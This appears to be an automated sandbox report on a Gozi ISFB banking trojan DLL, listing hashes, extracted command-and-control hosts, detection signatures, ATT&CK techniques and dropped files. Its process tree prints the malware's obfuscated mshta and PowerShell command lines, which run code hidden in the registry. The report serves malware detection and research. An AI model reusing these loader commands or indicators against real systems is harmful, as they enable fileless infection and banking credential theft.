gozi_ifsb | 251b7936786ed9284ce06582007fe75c3bc301fd0f1060fa53e71e54aff28a7f

Analysis

max time kernel
234s
max time network
235s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
07-07-2022 10:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

62c6b5af0566b.dll
Size

432KB
MD5

82186dbbba674eaeed2b4bb95a5a9fac
SHA1

00d0e69a746d05039b63fdd94eb2bce6ce27a4a7
SHA256

251b7936786ed9284ce06582007fe75c3bc301fd0f1060fa53e71e54aff28a7f
SHA512

91ba44bf86c583ae28a09c20bebd7b6a9d253e690ce3f358b669d48d17980f0a9b7a40acaa9325f773504bb98edcc9e8edd252716628dd7a79e5394e06d782b4

Score

10^/10

gozi_ifsb 3000 banker suricata trojan

Malware Config

Extracted

Family

gozi_ifsb

Botnet

3000

config.edge.skype.com

79.110.52.164

79.110.52.97

Attributes

base_path
/drew/
build
250239
exe_type
loader
extension
.jlk
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
suricata
Blocklisted process makes network request 2 IoCs

Processes:

rundll32.exe

flow pid process

30 3056 rundll32.exe
69 3056 rundll32.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation mshta.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

rundll32.exepowershell.exe

pid process

3056 rundll32.exe
3056 rundll32.exe
1596 powershell.exe
1596 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1596 powershell.exe

flow	pid	process
30	3056	rundll32.exe
69	3056	rundll32.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	mshta.exe

pid	process
3056	rundll32.exe
3056	rundll32.exe
1596	powershell.exe
1596	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1596	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

rundll32.exemshta.exepowershell.execsc.execsc.exe

description	pid	process	target process
PID 3372 wrote to memory of 3056	3372	rundll32.exe	rundll32.exe
PID 3372 wrote to memory of 3056	3372	rundll32.exe	rundll32.exe
PID 3372 wrote to memory of 3056	3372	rundll32.exe	rundll32.exe
PID 3904 wrote to memory of 1596	3904	mshta.exe	powershell.exe
PID 3904 wrote to memory of 1596	3904	mshta.exe	powershell.exe
PID 1596 wrote to memory of 1428	1596	powershell.exe	csc.exe
PID 1596 wrote to memory of 1428	1596	powershell.exe	csc.exe
PID 1428 wrote to memory of 2240	1428	csc.exe	cvtres.exe
PID 1428 wrote to memory of 2240	1428	csc.exe	cvtres.exe
PID 1596 wrote to memory of 2372	1596	powershell.exe	csc.exe
PID 1596 wrote to memory of 2372	1596	powershell.exe	csc.exe
PID 2372 wrote to memory of 1912	2372	csc.exe	cvtres.exe
PID 2372 wrote to memory of 1912	2372	csc.exe	cvtres.exe

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\62c6b5af0566b.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:3372

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\62c6b5af0566b.dll,#1
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:3056

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Rbvu='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rbvu).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\C012F697-1F67-F289-A9F4-C346ED68A7DA\\\DriverUrls'));if(!window.flag)close()</script>"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wukqui -value gp; new-alias -name embhyopb -value iex; embhyopb ([System.Text.Encoding]::ASCII.GetString((wukqui "HKCU:Software\AppDataLow\Software\Microsoft\C012F697-1F67-F289-A9F4-C346ED68A7DA").CollectByte))
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1596

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z0024kvt\z0024kvt.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1428

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF34F.tmp" "c:\Users\Admin\AppData\Local\Temp\z0024kvt\CSCBAFBBC4C84C429C855DF86DB8C255F5.TMP"
4⤵
PID:2240

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4umy5urv\4umy5urv.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:2372

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF497.tmp" "c:\Users\Admin\AppData\Local\Temp\4umy5urv\CSCF166E4CE9AF34A388A4C98E3C227F91.TMP"
4⤵
PID:1912

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4umy5urv\4umy5urv.dll
Filesize
3KB

MD5
2b52edb986645f7b4269715140b51a21

SHA1
623b5d04e2bdf086214196d506bd9f0107506d73

SHA256
9cc0372f7496e44d5319b56d7faa8f887a9c6d1d0591befcddabd9d87d8a0fa7

SHA512
4b84a0d9d7821c7d7e501da2f29b553f70708a6cab66924e4cecb00fe7f0eb7921d31dd84057021338b593f1c391c692ebd87e96df0c9f36b8ab740896e8dde0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF34F.tmp
Filesize
1KB

MD5
e4a8fd6ef55f2f2b75d6ba4337434cd9

SHA1
f9ff7e010f6a9fa7104638aca0fa2ac3512a4ece

SHA256
294b0f90ceb07b43a462586547425ec03f0e727c672058f54bd3df7dacdc5157

SHA512
b20775027416cbbad6a0f8cbc40a24135cf974797306811c9e3ffaf19bb2f767bea0232f9f2a36b638ddc855ca2771ce2344279594c32e61caacadb3c4590498

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF497.tmp
Filesize
1KB

MD5
c5d452c5e3cfaf68ade969d144385e1e

SHA1
7a1f91c494f397a127a5b835188af4568000499a

SHA256
165cdef31cf4d6f4092ccc41f7ac46eabeb1485854b9777306e4a66d12b23685

SHA512
6b5fb834eba72cd860cc85c7b7cf74fe7af83898c36cd82bcab1d5efe23b33b64bd88294ba474be6543964d734461ba134b7b1bf96c0fe2d3a244d966af6a02c

Download Submit
C:\Users\Admin\AppData\Local\Temp\z0024kvt\z0024kvt.dll
Filesize
3KB

MD5
9ccf3382bd0d89e8a4a9b29ad62c222a

SHA1
c1973b6822718f9eb0f2cdd8755c2b20ad9db164

SHA256
8b2feeae2a082e3b2072a0942e1f64c705e36c5862ebca0d51b60238d1e35984

SHA512
9ff50df00151da582e49a2417573b2428544e11acc440ef91a78aee3d2451a195d1102f23396ae5110b1e11812fa618526c9ba5945fb4cf1ed8977718eec7a10

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4umy5urv\4umy5urv.0.cs
Filesize
397B

MD5
d8855d5c9ffd303a8745198463f233c9

SHA1
52682118273b0c4c1815184cb321b6e338dd1497

SHA256
4b78635784aa51a597ace0766ad21d14851a9a56f551d9768f766c90c4ae299c

SHA512
3bde559ee53be9e9497e6dcd3575a423cf43a4426b9e2e4c80f227808008d59174d3db917b80979b63f419a3a23aad6bcc52c70187d9391a5ba5ec2c0637ecb1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4umy5urv\4umy5urv.cmdline
Filesize
369B

MD5
1b6a559a42a96aafb5919be9f4f6fc2b

SHA1
3c42c37005e22c1cf2cbe9f7ac191f3bbf2a47e9

SHA256
5145838ac610c3ba271e5896afe34a08b995b35b4510866a04c90d82d9f8d10c

SHA512
3cd9d8015767ca58cb363e39e1eda4599231eb7f60ba30b1d2a7d6df4f1e5402a3a0e1c83ae49eee499ccabc0e645fb610366da5e1ebfa04157203b8d67f087c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4umy5urv\CSCF166E4CE9AF34A388A4C98E3C227F91.TMP
Filesize
652B

MD5
0024bd6774e2018c9e7a455e25357e28

SHA1
79b0395e549568fd7e5cb4e60ccdb300e4203aaa

SHA256
0d8711b8344eebd90dfc8d675faeac5018458f42f2d5d056c6f976b978421d5f

SHA512
f70a08bd65474b9ec1d93ab8316f036443e1700585cfa376c21f27a6df3adeafb97cabf5c8fc373b3a1b9899512d22f4c38c1243e7a246622289196a31b91340

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\z0024kvt\CSCBAFBBC4C84C429C855DF86DB8C255F5.TMP
Filesize
652B

MD5
e805fb066fea2c14ef2f4f37c740342c

SHA1
e9e82217aeb9e05f76242a3d264c0de8c13da7df

SHA256
96011d02e3593f17b8ab8720637bb1ba1d9de23b38b59898d87da104db5943a6

SHA512
5ab46578986f486d737a4d1c7ebdb27e9a10681de4cff3fe313e670c93de571f001837ae6fb14fcc315f1c9dd64240a8b7096274a4a7d2e103ac0b6aef41ec2e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\z0024kvt\z0024kvt.0.cs
Filesize
398B

MD5
ea3e12ea1d866ba60cf2b75c9e4081cf

SHA1
369b0cba527ffd1adff2b6f5cbd9d7aac6c5e1d0

SHA256
8c277a1c32a25738fedea241a8dc31e9e50d19dbe01185daacccec8f4b022442

SHA512
a85410b2f4554f3e4765f142ee99f74464f76cf90e25b13686c36f57c6cbfab29d3a1fdcaf5ffd06ff9280ea81eecc3d5db278dbd366d05ce4ab6794a60b8367

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\z0024kvt\z0024kvt.cmdline
Filesize
369B

MD5
e898a7cb5154b3068a7d4820f6ee5a27

SHA1
9370f8bdd4c92a02128b3772323614ef159f85e5

SHA256
6db4958cd4d288c7188c12cd3029a712e9ede607633ad35bfc05e5c8024b99c4

SHA512
ea8fb70c632c838e0bb22aae50c2d7ba0a05dce9ef478b395fefbf7376a727f4c0900aadbfb9935d8d9960d470ed39ebea5aa86f75b60bbf37b4a8198f6c38f9

Download Submit
memory/1428-141-0x0000000000000000-mapping.dmp

Download
memory/1596-139-0x0000016D2B4F0000-0x0000016D2B512000-memory.dmp

Filesize
136KB

Download
memory/1596-140-0x00007FFD4F610000-0x00007FFD500D1000-memory.dmp

Filesize
10.8MB

Download
memory/1596-138-0x0000000000000000-mapping.dmp

Download
memory/1912-151-0x0000000000000000-mapping.dmp

Download
memory/2240-144-0x0000000000000000-mapping.dmp

Download
memory/2372-148-0x0000000000000000-mapping.dmp

Download
memory/3056-130-0x0000000000000000-mapping.dmp

Download
memory/3056-134-0x0000000002840000-0x000000000284D000-memory.dmp

Filesize
52KB

Download
memory/3056-133-0x0000000000A60000-0x0000000000A66000-memory.dmp

Filesize
24KB

Download
memory/3056-131-0x0000000000400000-0x000000000046E000-memory.dmp

Filesize
440KB

Download